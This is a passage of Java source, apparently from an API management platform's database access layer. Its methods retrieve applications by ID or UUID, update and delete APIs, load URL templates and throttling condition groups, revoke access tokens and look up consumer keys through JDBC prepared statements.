application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } public Application getApplicationById(int applicationId, String userId, String groupId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = 
SQLConstants.GET_APPLICATION_BY_ID_SQL; String whereClause = " AND SUB.USER_ID =?"; String whereClauseCaseInSensitive = " AND LOWER(SUB.USER_ID) =LOWER(?)"; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdCaseInSensitive = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? )"; String whereClauseWithMultiGroupIdCaseInSensitive = " AND ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR LOWER(SUB.USER_ID) = LOWER(?) )"; if (groupId != null && !"null".equals(groupId) && !groupId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithMultiGroupIdCaseInSensitive; } else { query = query + whereClauseWithMultiGroupId; } String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length + 1; //since index 1 is applicationId // query params will fil from 2 prepStmt = fillQueryParams(connection, query, groupIds, 2); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setInt(1, applicationId); prepStmt.setString(++parameterIndex, userId); } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithGroupIdCaseInSensitive; } else { query = query + whereClauseWithGroupId; } prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); prepStmt.setString(2, groupId); prepStmt.setString(3, userId); } } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseCaseInSensitive; } else { query = query + whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); prepStmt.setString(2, userId); } rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(applicationId)); } } } if (application != null) { Map<String,String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } 
catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Retrieves the Application which is corresponding to the given UUID String * * @param uuid UUID of Application * @return * @throws APIManagementException */ public Application getApplicationByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_UUID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, uuid); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } Timestamp createdTime = rs.getTimestamp("CREATED_TIME"); application.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = rs.getTimestamp("UPDATED_TIME"); application.setLastUpdatedTime( updated_time == null ? 
null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { // fixing Timestamp issue with default value '0000-00-00 00:00:00'for existing applications created application.setLastUpdatedTime(application.getCreatedTime()); } } // Get custom attributes of application if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * update URI templates define for an API * * @param api * @throws APIManagementException */ public void updateURLTemplates(API api) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int apiId; String deleteOldMappingsQuery = SQLConstants.REMOVE_FROM_URI_TEMPLATES_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); apiId = getAPIID(api.getId(), connection); if (apiId == -1) { //application addition has failed return; } prepStmt = connection.prepareStatement(deleteOldMappingsQuery); prepStmt.setInt(1, apiId); prepStmt.execute(); addURLTemplates(apiId, api, connection); connection.commit(); } catch (SQLException e) { handleException("Error while deleting URL template(s) for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * returns all URL templates define for all active(PUBLISHED) APIs. */ public ArrayList<URITemplate> getAllURITemplates(String apiContext, String version) throws APIManagementException { if (APIUtil.isAdvanceThrottlingEnabled()) { return getAllURITemplatesAdvancedThrottle(apiContext, version); } else { return getAllURITemplatesOldThrottle(apiContext, version); } } public ArrayList<URITemplate> getAllURITemplatesOldThrottle(String apiContext, String version) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; ArrayList<URITemplate> uriTemplates = new ArrayList<URITemplate>(); //TODO : FILTER RESULTS ONLY FOR ACTIVE APIs String query = SQLConstants.GET_ALL_URL_TEMPLATES_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiContext); prepStmt.setString(2, version); rs = prepStmt.executeQuery(); URITemplate uriTemplate; while (rs.next()) { uriTemplate = new URITemplate(); String script = null; uriTemplate.setHTTPVerb(rs.getString("HTTP_METHOD")); uriTemplate.setAuthType(rs.getString("AUTH_SCHEME")); uriTemplate.setUriTemplate(rs.getString("URL_PATTERN")); uriTemplate.setThrottlingTier(rs.getString("THROTTLING_TIER")); InputStream mediationScriptBlob = rs.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); } uriTemplate.setMediationScript(script); uriTemplate.getThrottlingConditions().add("_default"); uriTemplates.add(uriTemplate); } } catch (SQLException e) { handleException("Error while fetching all URL Templates", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return uriTemplates; } public ArrayList<URITemplate> getAllURITemplatesAdvancedThrottle(String apiContext, String version) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int tenantId; 
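        // Resolve the owning tenant from the API context so condition groups are read against the correct
        // tenant's throttle policies; a context without a tenant domain falls back to the super tenant.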
ArrayList<URITemplate> uriTemplates = new ArrayList<URITemplate>(); String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(apiContext); if (apiTenantDomain != null) { tenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); } else { tenantId = MultitenantConstants.SUPER_TENANT_ID; } // TODO : FILTER RESULTS ONLY FOR ACTIVE APIs String query = SQLConstants.ThrottleSQLConstants.GET_CONDITION_GROUPS_FOR_POLICIES_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiContext); prepStmt.setString(2, version); prepStmt.setInt(3, tenantId); rs = prepStmt.executeQuery(); Map<String, Set<ConditionGroupDTO>> mapByHttpVerbURLPatternToId = new HashMap<String, Set<ConditionGroupDTO>>(); while (rs != null && rs.next()) { String httpVerb = rs.getString("HTTP_METHOD"); String authType = rs.getString("AUTH_SCHEME"); String urlPattern = rs.getString("URL_PATTERN"); String policyName = rs.getString("THROTTLING_TIER"); String conditionGroupId = rs.getString("CONDITION_GROUP_ID"); String applicableLevel = rs.getString("APPLICABLE_LEVEL"); String policyConditionGroupId = "_condition_" + conditionGroupId; String key = httpVerb + ":" + urlPattern; if (mapByHttpVerbURLPatternToId.containsKey(key)) { if (StringUtils.isEmpty(conditionGroupId)) { continue; } // Converting ConditionGroup to a lightweight ConditionGroupDTO. ConditionGroupDTO groupDTO = createConditionGroupDTO(Integer.parseInt(conditionGroupId)); groupDTO.setConditionGroupId(policyConditionGroupId); // mapByHttpVerbURLPatternToId.get(key).add(policyConditionGroupId); mapByHttpVerbURLPatternToId.get(key).add(groupDTO); } else { String script = null; URITemplate uriTemplate = new URITemplate(); uriTemplate.setThrottlingTier(policyName); uriTemplate.setAuthType(authType); uriTemplate.setHTTPVerb(httpVerb); uriTemplate.setUriTemplate(urlPattern); uriTemplate.setApplicableLevel(applicableLevel); InputStream mediationScriptBlob = rs.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); } uriTemplate.setMediationScript(script); Set<ConditionGroupDTO> conditionGroupIdSet = new HashSet<ConditionGroupDTO>(); mapByHttpVerbURLPatternToId.put(key, conditionGroupIdSet); uriTemplates.add(uriTemplate); if (StringUtils.isEmpty(conditionGroupId)) { continue; } ConditionGroupDTO groupDTO = createConditionGroupDTO(Integer.parseInt(conditionGroupId)); groupDTO.setConditionGroupId(policyConditionGroupId); conditionGroupIdSet.add(groupDTO); } } for (URITemplate uriTemplate : uriTemplates) { String key = uriTemplate.getHTTPVerb() + ":" + uriTemplate.getUriTemplate(); if (mapByHttpVerbURLPatternToId.containsKey(key)) { if (!mapByHttpVerbURLPatternToId.get(key).isEmpty()) { Set<ConditionGroupDTO> conditionGroupDTOs = mapByHttpVerbURLPatternToId.get(key); ConditionGroupDTO defaultGroup = new ConditionGroupDTO(); defaultGroup.setConditionGroupId(APIConstants.THROTTLE_POLICY_DEFAULT); conditionGroupDTOs.add(defaultGroup); // uriTemplate.getThrottlingConditions().addAll(mapByHttpVerbURLPatternToId.get(key)); uriTemplate.getThrottlingConditions().add(APIConstants.THROTTLE_POLICY_DEFAULT); uriTemplate.setConditionGroups(conditionGroupDTOs.toArray(new ConditionGroupDTO[]{})); } } if (uriTemplate.getThrottlingConditions().isEmpty()) { uriTemplate.getThrottlingConditions().add(APIConstants.THROTTLE_POLICY_DEFAULT); ConditionGroupDTO defaultGroup = new ConditionGroupDTO(); 
defaultGroup.setConditionGroupId(APIConstants.THROTTLE_POLICY_DEFAULT); uriTemplate.setConditionGroups(new ConditionGroupDTO[]{defaultGroup}); } } } catch (SQLException e) { handleException("Error while fetching all URL Templates", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return uriTemplates; } /** * This method is used to get the API provider by giving API name, API version and tenant domain * * @param apiName API name * @param apiVersion API version * @param tenant tenant domain * @return API provider * @throws APIManagementException if failed to get the API provider by giving API name, API version, tenant domain */ public String getAPIProviderByNameAndVersion(String apiName, String apiVersion, String tenant) throws APIManagementException { if (StringUtils.isBlank(apiName) || StringUtils.isBlank(apiVersion) || StringUtils.isBlank(tenant)) { String msg = "API name, version, tenant cannot be null when fetching provider"; log.error(msg); throw new APIManagementException(msg); } PreparedStatement prepStmt = null; ResultSet rs = null; String apiProvider = null; String getAPIProviderQuery = null; try(Connection connection = APIMgtDBUtil.getConnection()) { if (MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equalsIgnoreCase(tenant)) { //in this case, the API should be fetched from super tenant getAPIProviderQuery = SQLConstants.GET_API_PROVIDER_WITH_NAME_VERSION_FOR_SUPER_TENANT; prepStmt = connection.prepareStatement(getAPIProviderQuery); } else { //in this case, the API should be fetched from the respective tenant getAPIProviderQuery = SQLConstants.GET_API_PROVIDER_WITH_NAME_VERSION_FOR_GIVEN_TENANT; prepStmt = connection.prepareStatement(getAPIProviderQuery); prepStmt.setString(3, "%" + tenant + "%"); } prepStmt.setString(1, apiName); prepStmt.setString(2, apiVersion); rs = prepStmt.executeQuery(); if (rs.next()) { apiProvider = rs.getString("API_PROVIDER"); } if (StringUtils.isBlank(apiProvider)) { String msg = "Unable to find provider for API: " + apiName + " in the database"; log.warn(msg); } } catch (SQLException e) { handleException("Error while locating API: " + apiName + " from the database", e); } return apiProvider; } /** * Converts an {@code Pipeline} object into a {@code ConditionGroupDTO}.{@code ConditionGroupDTO} class tries to * contain the same information held by {@code Pipeline}, but in a much lightweight fashion. * * @param conditionGroup Id of the condition group ({@code Pipeline}) to be converted * @return An object of {@code ConditionGroupDTO} type. 
* @throws APIManagementException */ private ConditionGroupDTO createConditionGroupDTO(int conditionGroup) throws APIManagementException { List<Condition> conditions = getConditions(conditionGroup); ArrayList<ConditionDTO> conditionDTOs = new ArrayList<ConditionDTO>(conditions.size()); for (Condition condition : conditions) { ConditionDTO conditionDTO = new ConditionDTO(); conditionDTO.setConditionType(condition.getType()); conditionDTO.isInverted(condition.isInvertCondition()); if (PolicyConstants.IP_RANGE_TYPE.equals(condition.getType())) { IPCondition ipRangeCondition = (IPCondition) condition; conditionDTO.setConditionName(ipRangeCondition.getStartingIP()); conditionDTO.setConditionValue(ipRangeCondition.getEndingIP()); } else if (PolicyConstants.IP_SPECIFIC_TYPE.equals(condition.getType())) { IPCondition ipCondition = (IPCondition) condition; conditionDTO.setConditionName(PolicyConstants.IP_SPECIFIC_TYPE); conditionDTO.setConditionValue(ipCondition.getSpecificIP()); } else if (PolicyConstants.HEADER_TYPE.equals(condition.getType())) { HeaderCondition headerCondition = (HeaderCondition) condition; conditionDTO.setConditionName(headerCondition.getHeaderName()); conditionDTO.setConditionValue(headerCondition.getValue()); } else if (PolicyConstants.JWT_CLAIMS_TYPE.equals(condition.getType())) { JWTClaimsCondition jwtClaimsCondition = (JWTClaimsCondition) condition; conditionDTO.setConditionName(jwtClaimsCondition.getClaimUrl()); conditionDTO.setConditionValue(jwtClaimsCondition.getAttribute()); } else if (PolicyConstants.QUERY_PARAMETER_TYPE.equals(condition.getType())) { QueryParameterCondition parameterCondition = (QueryParameterCondition) condition; conditionDTO.setConditionName(parameterCondition.getParameter()); conditionDTO.setConditionValue(parameterCondition.getValue()); } conditionDTOs.add(conditionDTO); } ConditionGroupDTO conditionGroupDTO = new ConditionGroupDTO(); conditionGroupDTO.setConditions(conditionDTOs.toArray(new ConditionDTO[]{})); return conditionGroupDTO; } public void updateAPI(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String previousDefaultVersion = getDefaultVersion(api.getId()); String query = SQLConstants.UPDATE_API_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); //Header change check not required here as we update API level throttling tier //from same call. //TODO review and run tier update as separate query if need. prepStmt = connection.prepareStatement(query); prepStmt.setString(1, api.getContext()); String contextTemplate = api.getContextTemplate(); //If the context template ends with {version} this means that the version will be at the end of the // context. if (contextTemplate.endsWith("/" + APIConstants.VERSION_PLACEHOLDER)) { //Remove the {version} part from the context template. contextTemplate = contextTemplate.split(Pattern.quote("/" + APIConstants.VERSION_PLACEHOLDER))[0]; } prepStmt.setString(2, contextTemplate); //TODO Need to find who exactly does this update. 
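            // Parameter 3 is deliberately cleared here (see the TODO above). The parameters that follow carry
            // the update timestamp, the API-level throttle policy, and the provider/name/version values that
            // (presumably, per UPDATE_API_SQL) select the row being updated.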
prepStmt.setString(3, null); prepStmt.setTimestamp(4, new Timestamp(System.currentTimeMillis())); prepStmt.setString(5, api.getApiLevelPolicy()); prepStmt.setString(6, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setString(7, api.getId().getApiName()); prepStmt.setString(8, api.getId().getVersion()); prepStmt.execute(); //} if (api.isDefaultVersion() ^ api.getId().getVersion().equals(previousDefaultVersion)) { //A change has // happen //If the api is selected as default version, it is added/replaced into AM_API_DEFAULT_VERSION table if (api.isDefaultVersion()) { addUpdateAPIAsDefaultVersion(api, connection); } else { //tick is removed removeAPIFromDefaultVersion(api.getId(), connection); } } connection.commit(); //check whether there are any associated api products before updating url temaplates and scopes //TODO move to constants String queryGetAssociatedAPIProducts = "SELECT AM_API_PRODUCT.UUID " + "FROM AM_API_PRODUCT_MAPPING, AM_API_URL_MAPPING, AM_API_PRODUCT " + "WHERE " + "AM_API_PRODUCT_MAPPING.URL_MAPPING_ID = AM_API_URL_MAPPING.URL_MAPPING_ID " + "AND AM_API_PRODUCT.API_PRODUCT_ID = AM_API_PRODUCT_MAPPING.API_PRODUCT_ID " + "AND API_ID = ?"; int apiId = getAPIID(api.getId(), connection); PreparedStatement prepStmtGetAssociatedAPIProducts = connection .prepareStatement(queryGetAssociatedAPIProducts); prepStmtGetAssociatedAPIProducts.setInt(1, apiId); ResultSet rs = null; rs = prepStmtGetAssociatedAPIProducts.executeQuery(); List<APIProduct> apiProducts = new ArrayList<APIProduct>(); while (rs.next()) { String productUUID = rs.getString("UUID"); apiProducts.add(getAPIProduct(productUUID)); } synchronized (scopeMutex) { //remove api product mappings before updating api url templates deleteProductMappingsForAPI(api, apiProducts); updateScopes(api, tenantId); updateURLTemplates(api); /* update scopes above will delete all scopes and scope mappings associated with API (including product scopes). after update url templates template ids will change. So we have to add product scopes and mappings again after updating api templates */ addProductMappingsForAPI(api, apiProducts); addProductScopes(apiProducts, tenantId); } } catch (SQLException e) { handleException("Error while updating the API: " + api.getId() + " in the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public int getAPIID(APIIdentifier apiId, Connection connection) throws APIManagementException { boolean created = false; PreparedStatement prepStmt = null; ResultSet rs = null; int id = -1; String getAPIQuery = SQLConstants.GET_API_ID_SQL; try { if (connection == null) { // If connection is not provided a new one will be created. connection = APIMgtDBUtil.getConnection(); created = true; } prepStmt = connection.prepareStatement(getAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); rs = prepStmt.executeQuery(); if (rs.next()) { id = rs.getInt("API_ID"); } if (id == -1) { String msg = "Unable to find the API: " + apiId + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while locating API: " + apiId + " from the database", e); } finally { if (created) { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } else { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } } return id; } /** * Get product Id from the product name and the provider. 
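     * <p>
     * Illustrative call only; the variable name {@code apiMgtDAO} and the product/provider values below are
     * assumptions, not part of this class's contract. Passing {@code null} for the connection makes the method
     * open and close its own connection:
     * <pre>{@code
     * int productId = apiMgtDAO.getAPIProductID("PizzaShackProduct", "admin", null);
     * }</pre>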
* @param productName product name * @param provider provider * @param connection db connection * @return product id * @throws APIManagementException exception */ public int getAPIProductID(String productName, String provider, Connection connection) throws APIManagementException { boolean created = false; PreparedStatement prepStmt = null; ResultSet rs = null; int id = -1; String getAPIQuery = SQLConstants.GET_API_PRODUCT_ID_SQL; try { if (connection == null) { // If connection is not provided a new one will be created. connection = APIMgtDBUtil.getConnection(); created = true; } prepStmt = connection.prepareStatement(getAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(provider)); prepStmt.setString(2, productName); rs = prepStmt.executeQuery(); if (rs.next()) { id = rs.getInt("API_PRODUCT_ID"); } if (id == -1) { String msg = "Unable to find the API Product : " + productName + "-" + provider + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while locating API: " + productName + "-" + provider + " from the database", e); } finally { if (created) { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } else { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } } return id; } /** * Delete a record from AM_APPLICATION_KEY_MAPPING table * * @param consumerKey * @throws APIManagementException */ public void deleteApplicationMappingByConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String deleteApplicationKeyQuery = SQLConstants.REMOVE_APPLICATION_MAPPINGS_BY_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(deleteApplicationKeyQuery); prepStmt.setString(1, consumerKey); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting mapping: consumer key " + consumerKey + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public void deleteAPI(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int id; String deleteLCEventQuery = SQLConstants.REMOVE_FROM_API_LIFECYCLE_SQL; String deleteCommentQuery = SQLConstants.REMOVE_FROM_API_COMMENT_SQL; String deleteRatingsQuery = SQLConstants.REMOVE_FROM_API_RATING_SQL; String deleteSubscriptionQuery = SQLConstants.REMOVE_FROM_API_SUBSCRIPTION_SQL; String deleteExternalAPIStoresQuery = SQLConstants.REMOVE_FROM_EXTERNAL_STORES_SQL; String deleteAPIQuery = SQLConstants.REMOVE_FROM_API_SQL; String deleteURLTemplateQuery = SQLConstants.REMOVE_FROM_API_URL_MAPPINGS_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); id = getAPIID(apiId, connection); synchronized (scopeMutex) { removeAPIScope(apiId); } prepStmt = connection.prepareStatement(deleteSubscriptionQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here //Delete all comments associated with given API prepStmt = connection.prepareStatement(deleteCommentQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteRatingsQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, 
this statement will close in finally else here prepStmt = connection.prepareStatement(deleteLCEventQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here //Delete all external APIStore details associated with a given API prepStmt = connection.prepareStatement(deleteExternalAPIStoresQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteURLTemplateQuery); prepStmt.setInt(1, id); prepStmt.execute(); String curDefaultVersion = getDefaultVersion(apiId); String pubDefaultVersion = getPublishedDefaultVersion(apiId); if (apiId.getVersion().equals(curDefaultVersion)) { removeAPIFromDefaultVersion(apiId, connection); } else if (apiId.getVersion().equals(pubDefaultVersion)) { setPublishedDefVersion(apiId, connection, null); } connection.commit(); } catch (SQLException e) { handleException("Error while removing the API: " + apiId + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Change access token status in to revoked in database level. * * @param key API Key to be revoked * @throws APIManagementException on error in revoking access token */ public void revokeAccessToken(String key) throws APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(key, accessTokenStoreTable); Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.REMOVE_ACCESS_TOKEN_PREFIX + accessTokenStoreTable + SQLConstants .REVOKE_ACCESS_TOKEN_SUFFIX; ps = conn.prepareStatement(query); ps.setString(1, APIUtil.encryptToken(key)); ps.execute(); conn.commit(); } catch (SQLException e) { handleException("Error in revoking access token: " + e.getMessage(), e); } catch (CryptoException e) { handleException("Error in revoking access token: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * Get all applications associated with given tier * * @param tier String tier name * @return Application object array associated with tier * @throws APIManagementException on error in getting applications array */ public Application[] getApplicationsByTier(String tier) throws APIManagementException { if (tier == null) { return null; } Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATION_BY_TIER_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, tier); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("NAME"), getSubscriber(rs.getString("SUBSCRIBER_ID"))); application.setId(rs.getInt("APPLICATION_ID")); applicationsList.add(application); } 
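            // Sort the collected applications by name, case-insensitively, before handing callers the array.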
Collections.sort(applicationsList, new Comparator<Application>() { public int compare(Application o1, Application o2) { return o1.getName().compareToIgnoreCase(o2.getName()); } }); applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } private void handleException(String msg, Throwable t) throws APIManagementException { log.error(msg, t); throw new APIManagementException(msg, t); } public HashMap<String, String> getURITemplatesPerAPIAsString(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; int apiId; HashMap<String, String> urlMappings = new LinkedHashMap<String, String>(); try { conn = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, conn); String sqlQuery = SQLConstants.GET_URL_TEMPLATES_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { String script = null; String uriPattern = resultSet.getString("URL_PATTERN"); String httpMethod = resultSet.getString("HTTP_METHOD"); String authScheme = resultSet.getString("AUTH_SCHEME"); String throttlingTier = resultSet.getString("THROTTLING_TIER"); InputStream mediationScriptBlob = resultSet.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); // set null if the script is empty. Otherwise ArrayIndexOutOfBoundsException occurs when trying // to split by :: if (script.isEmpty()) { script = null; } } urlMappings.put(uriPattern + "::" + httpMethod + "::" + authScheme + "::" + throttlingTier + "::" + script, null); } } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return urlMappings; } // This should be only used only when Token Partitioning is enabled. public String getConsumerKeyForTokenWhenTokenPartitioningEnabled(String accessToken) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String accessTokenStoreTable = APIUtil.getAccessTokenStoreTableFromAccessToken(accessToken); StringBuilder authorizedDomains = new StringBuilder(); String getCKFromTokenSQL = "SELECT CONSUMER_KEY " + " FROM " + accessTokenStoreTable + " WHERE ACCESS_TOKEN = ? 
"; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(getCKFromTokenSQL); prepStmt.setString(1, APIUtil.encryptToken(accessToken)); rs = prepStmt.executeQuery(); boolean first = true; while (rs.next()) { String domain = rs.getString(1); if (first) { authorizedDomains.append(domain); first = false; } else { authorizedDomains.append(',').append(domain); } } } catch (SQLException e) { throw new APIManagementException("Error in retrieving access allowing domain list from table.", e); } catch (CryptoException e) { throw new APIManagementException("Error in retrieving access allowing domain list from table.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return authorizedDomains.toString(); } return null; } public String findConsumerKeyFromAccessToken(String accessToken) throws APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); Connection connection = null; PreparedStatement smt = null; ResultSet rs = null; String consumerKey = null; try { String getConsumerKeySql = SQLConstants.GET_CONSUMER_KEY_BY_ACCESS_TOKEN_PREFIX + accessTokenStoreTable + SQLConstants.GET_CONSUMER_KEY_BY_ACCESS_TOKEN_SUFFIX; connection = 